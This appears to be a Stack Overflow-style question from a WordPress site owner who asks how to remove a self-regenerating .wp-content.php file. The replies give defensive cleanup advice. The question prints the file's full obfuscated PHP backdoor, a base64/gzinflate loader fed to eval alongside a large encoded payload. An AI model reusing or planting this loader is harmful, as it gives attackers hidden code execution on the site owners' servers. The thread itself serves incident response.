# suspicious file on my server (.wp-content.php)

Tags: php, wordpress, malware

In my wp-content folder there is a suspicious .wp-content.php file that is regenerated every time I delete or modify it. How can I permanently remove it?

This is the malicious code inside

```
<?php
$stt1 = "Sy1LzNFQt7dT10uvKs1Lzs8tKEotLtZIr8rMS8tJLEnVSEosTjUziU9JT\x635PSdUoLikqSi3TU\x43kuKTHQ\x42\x41Fr\x41\x41\x3d\x3d";
$stt0 = "==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";
eval(htmlspecialchars_decode(gzinflate(base64_decode($stt1))));
?>
```

permanently delete file.

Comment: Delete it. Look for other suspicious files. Update your Wordpress, update all of the plugins

Comment: The web server process should not have write access to the files it serves.

Comment: No, not "Delete it" as this solves nothing really (Still it would be good to try to figure out how this was possible). Put the site completely down and restore from trusted backup or from scratch using **recent** versions of WP and esp. plugins. Also disable all the plugins you do not need but got installed. Other than that this is off-topic question :P

Comment: Time to read the ServerFault [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) question.

Answer (score 1):

It is being created by other script, and the script can be anywhere on your server. There is no point worrying about this particular file, since your server is infected.

1. @aynber suggestion is correct, but I'm afraid it won't be sufficient. Begin with it anyway.
2. You should call/write to your hosting provider including what you described here and adding full filename path (directory on your FTP).
3. Aside of that, download all files from your FTP server and scan 'em with some antivirus software — e.g. free ClamAV. PHP backdoors can be detected by them too.